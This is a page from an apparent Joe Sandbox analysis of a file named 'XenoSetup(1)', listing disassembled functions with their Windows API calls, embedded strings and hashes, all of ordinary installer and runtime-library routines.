Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9566c7183f53877eae2bb9d0d42aa9511d533a330945d0c0cb6be8b7c1830a69
Instruction ID: 1dd6d16c7d46924df7eb24087fc086c652035020198a8415b4909df662b89949
Opcode Fuzzy Hash: 9566c7183f53877eae2bb9d0d42aa9511d533a330945d0c0cb6be8b7c1830a69
Instruction Fuzzy Hash: F4A02474301100CFC310CF30774C30C3FF475041D030500157C44C4004D73D40505700

Function 00FEE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FEE30E

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

Part of subcall function 00FF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01021030,00000200,00FED928,00000000,?,00000050,01021030), ref: 00FF1DC4

_strlen.LIBCMT ref: 00FEE32F
SetDlgItemTextW.USER32(?,0101E274,?), ref: 00FEE38F
GetWindowRect.USER32(?,?), ref: 00FEE3C9
GetClientRect.USER32(?,?), ref: 00FEE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00FEE475
GetWindowRect.USER32(?,?), ref: 00FEE4A2
SetWindowTextW.USER32(?,?), ref: 00FEE4DB
GetSystemMetrics.USER32(00000008), ref: 00FEE4E3
GetWindow.USER32(?,00000005), ref: 00FEE4EE
GetWindowRect.USER32(00000000,?), ref: 00FEE51B
GetWindow.USER32(00000000,00000002), ref: 00FEE58D

Strings

CAPTION, xrefs: 00FEE4BD
d, xrefs: 00FEE3F5
$%s:, xrefs: 00FEE302

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 1e50079bb6c172b19e325347114e8e85503c05580f770a3eea1f4b770f58ef56
Instruction ID: b7c18bd9f79cd0708f436d2ca6586837a5b6c66db906dc8a984d6cee0d1bd974
Opcode Fuzzy Hash: 1e50079bb6c172b19e325347114e8e85503c05580f770a3eea1f4b770f58ef56
Instruction Fuzzy Hash: E281A0B2608341AFD720DF69DD88A6FBBE9FBC8714F04091DFA84D7294D635E8058B52

Function 0100CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0100CB66

Part of subcall function 0100C701: _free.LIBCMT ref: 0100C71E
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C730
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C742
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C754
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C766
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C778
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C78A
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C79C
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7AE
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7C0
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7D2
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7E4
Part of subcall function 0100C701: _free.LIBCMT ref: 0100C7F6

_free.LIBCMT ref: 0100CB5B

Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4

_free.LIBCMT ref: 0100CB7D
_free.LIBCMT ref: 0100CB92
_free.LIBCMT ref: 0100CB9D
_free.LIBCMT ref: 0100CBBF
_free.LIBCMT ref: 0100CBD2
_free.LIBCMT ref: 0100CBE0
_free.LIBCMT ref: 0100CBEB
_free.LIBCMT ref: 0100CC23
_free.LIBCMT ref: 0100CC2A
_free.LIBCMT ref: 0100CC47
_free.LIBCMT ref: 0100CC5F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 83d4cf5c3931e2573c32767ad06921b2ab64ffa53c5175debfe0d09ff8c6b4c0
Instruction ID: 9622e71a962c0dcfad891f4d3679700aec73eb7f89614c24187de0eca03f8b51
Opcode Fuzzy Hash: 83d4cf5c3931e2573c32767ad06921b2ab64ffa53c5175debfe0d09ff8c6b4c0
Instruction Fuzzy Hash: ED314D31A006079FFB63AA7CDA44B9A77E9BF10210F1486AAE5C9D71D1DE75A840DB10

Function 00FF9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FF9736
_wcslen.LIBCMT ref: 00FF97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00FF97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FF9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF982D

Strings

utf-8"></head>, xrefs: 00FF976B
</html>, xrefs: 00FF97B7
<html>, xrefs: 00FF9755, 00FF978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00FF9760

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: d5e920ebcda9856f0c2073aa673920104e070ae224454fda12ef27a83e052720
Instruction ID: 0cc4ed1931b752d9c4366436c4edca464d87c4e5e03b20a89ea4902c9e9eae2b
Opcode Fuzzy Hash: d5e920ebcda9856f0c2073aa673920104e070ae224454fda12ef27a83e052720
Instruction Fuzzy Hash: EF3137325083067EE726AB21DC45FBB7798EF52760F14011DF6819A1E1EBA99904C3A6

Function 00FFD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00FFD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00FFD6ED

Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00FFD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FFD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00FFD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FFD75D
DeleteObject.GDI32(00000000), ref: 00FFD764
GetWindow.USER32(00000000,00000002), ref: 00FFD76D

Strings

STATIC, xrefs: 00FFD6F3

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 74d468f30867a303094a22fc958fa28e9a3eb7e3245919af1c56c05ccc154115
Instruction ID: bf55afac75985f7eb12e084dc5145d1c6c822638034120a03cfe46af99f82de6
Opcode Fuzzy Hash: 74d468f30867a303094a22fc958fa28e9a3eb7e3245919af1c56c05ccc154115
Instruction Fuzzy Hash: 301127B75003287BE6317B709D8AFBF765DBF00711F004110FB81E90A5D66D890566A5

Function 010096F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01009705

Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4

_free.LIBCMT ref: 01009711
_free.LIBCMT ref: 0100971C
_free.LIBCMT ref: 01009727
_free.LIBCMT ref: 01009732
_free.LIBCMT ref: 0100973D
_free.LIBCMT ref: 01009748
_free.LIBCMT ref: 01009753
_free.LIBCMT ref: 0100975E
_free.LIBCMT ref: 0100976C

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bd33bec98f1369e67f8e4a0a77f14615662136e08ad6e202369eea37d8a388e2
Instruction ID: 55d2d76c4b82df75eb6da8d4e26b61e78acce4d56147264a03a88b98fafce111
Opcode Fuzzy Hash: bd33bec98f1369e67f8e4a0a77f14615662136e08ad6e202369eea37d8a388e2
Instruction Fuzzy Hash: AF11A77651010AAFEB02FF54C840CD93BB5FF24250F5196A2FA4C4F2A1DA32DA50DB84

Function 01002E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 01002F50
___TypeMatch.LIBVCRUNTIME ref: 0100305E
_UnwindNestedFrames.LIBCMT ref: 010031B0
CallUnexpected.LIBVCRUNTIME ref: 010031CB
_abort.LIBCMT ref: 010031D0

Strings

csm, xrefs: 01002F87
csm, xrefs: 01002EDB
csm, xrefs: 01002E6E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: baef9006a63eeecbc7588e68935448257cafdfad4839939b48811345504bf56d
Instruction ID: 2babdbd9b7e4bcf9154459a79b57931da87c262a491cb5c8dda438d3acbc9d72
Opcode Fuzzy Hash: baef9006a63eeecbc7588e68935448257cafdfad4839939b48811345504bf56d
Instruction Fuzzy Hash: F2B16E71800209DFEF27DFA8C8849EEBBB5BF18310F15419AE8856F292D731DA51CB91

Function 00FE6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE6FAA
_wcslen.LIBCMT ref: 00FE7013
_wcslen.LIBCMT ref: 00FE7084

Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00FE6FCC
UNC\, xrefs: 00FE7051
SeRestorePrivilege, xrefs: 00FE6FC2
\??\, xrefs: 00FE702B

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 5e6d5aaaecdd8deb08c674c29ddb01606ac4d4d513edc305654855b428454c88
Instruction ID: 3c80dc610cf62f25c11d47bf618ad322c32179c2b1ea22664ba76a0505f2b051
Opcode Fuzzy Hash: 5e6d5aaaecdd8deb08c674c29ddb01606ac4d4d513edc305654855b428454c88
Instruction Fuzzy Hash: CD4114B1D083C4AAEB31FB729C81FEF776CAF14314F000455FA85A6182D77DAA48A721

Function 00FFB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

EndDialog.USER32(?,00000001), ref: 00FFB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00FFB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FFB650
SetWindowTextW.USER32(?,?), ref: 00FFB661
GetDlgItem.USER32(?,00000065), ref: 00FFB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FFB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FFB694

Strings

LICENSEDLG, xrefs: 00FFB5D4

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 1759c8d2550ba5a4e123bc2e45fb23417967ecd15deb0c885d79308c11520b28
Instruction ID: a6687556f090abcb678f14e9a4a85bfcc5c956235f2b79e84db5baf325ca3e68
Opcode Fuzzy Hash: 1759c8d2550ba5a4e123bc2e45fb23417967ecd15deb0c885d79308c11520b28
Instruction Fuzzy Hash: 9A21E6726442197BD2315E66EE89F3B3B6DFF4AB50F010014F780D9198DB9B9801A731

Function 00FFFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,E81FEB93,00000001,00000000,00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE14
SysAllocString.OLEAUT32(00000000), ref: 00FFFE1F
_com_issue_error.COMSUPP ref: 00FFFE48
_com_issue_error.COMSUPP ref: 00FFFE52
GetLastError.KERNEL32(80070057,E81FEB93,00000001,00000000,00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE57
_com_issue_error.COMSUPP ref: 00FFFE6A
GetLastError.KERNEL32(00000000,?,?,00FEAF6C,ROOT\CIMV2), ref: 00FFFE80
_com_issue_error.COMSUPP ref: 00FFFE93

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 8503504f317ef4427a5fc75034659b4625b1d3825e54f007eeaebade8562b2e5
Instruction ID: 4150a7bf609d5cd270079d61b7019859df77f19a64c5725db829d52ef81192e1
Opcode Fuzzy Hash: 8503504f317ef4427a5fc75034659b4625b1d3825e54f007eeaebade8562b2e5
Instruction Fuzzy Hash: A141C771A0021DABD7119F64DC45BBEBBA8FF44720F104239FA45EB2A1D739990497A4

Function 00FEAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FEAF29

Strings

Windows 10, xrefs: 00FEB0C2
WQL, xrefs: 00FEAFDC
Name, xrefs: 00FEB0B0
SELECT * FROM Win32_OperatingSystem, xrefs: 00FEAFCA
ROOT\CIMV2, xrefs: 00FEAF5C

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2f296402dcc797a773c7dfa4ba139b163de7badd31b590caa045c29699dad09c
Instruction ID: 5969dee1718d95a3cd0aeb4ce6f9313a1c445eb96acc5448ec5d655af9fb7770
Opcode Fuzzy Hash: 2f296402dcc797a773c7dfa4ba139b163de7badd31b590caa045c29699dad09c
Instruction Fuzzy Hash: 29718071A00259EFDF14DFA6CC959AFBBB9FF48320B14015DE552AB2A0CB396D01DB50

Function 00FE9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FE93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FE93C9

Part of subcall function 00FEC29A: _wcslen.LIBCMT ref: 00FEC2A2

Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1

_swprintf.LIBCMT ref: 00FE9465

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

MoveFileW.KERNEL32(?,?), ref: 00FE94D4
MoveFileW.KERNEL32(?,?), ref: 00FE9514

Strings

rtmp%d, xrefs: 00FE944E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 87b37eb559d2561d96ff827083c0c2d146c4e0b8bebdb2b5e48c2e85aa53111f
Instruction ID: e65d2d2347038f577655386c4aa6a23d364a6bb2bdc9ea0d0cd89337fd14a45c
Opcode Fuzzy Hash: 87b37eb559d2561d96ff827083c0c2d146c4e0b8bebdb2b5e48c2e85aa53111f
Instruction Fuzzy Hash: DC41A771904299A6CF21EB62CC55EEE73BCBF40350F0448A5B64AE3051DB7C8B89EB70

Function 00FF1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00FF122E

Part of subcall function 00FEB146: GetVersionExW.KERNEL32(?), ref: 00FEB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FF1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FF1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FF1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FF12CF
__aullrem.LIBCMT ref: 00FF1379

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: d332106af099b0785d133554c9e640e7a9b702eeaecb54711cb6cdb6c5d7cc7c
Instruction ID: e06291bd0c5d5c3c3c76eb94e735e4e3c63aa79818cbb738873f9a12c930161f
Opcode Fuzzy Hash: d332106af099b0785d133554c9e640e7a9b702eeaecb54711cb6cdb6c5d7cc7c
Instruction Fuzzy Hash: CD4115B2508309AFC710DF65C88496BBBF9FF88714F00892EF696C6210E739E549DB52

Function 00FE2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FE2536

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0

Strings

xc%u, xrefs: 00FE275A
;%u, xrefs: 00FE2523
x%u, xrefs: 00FE26FD

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
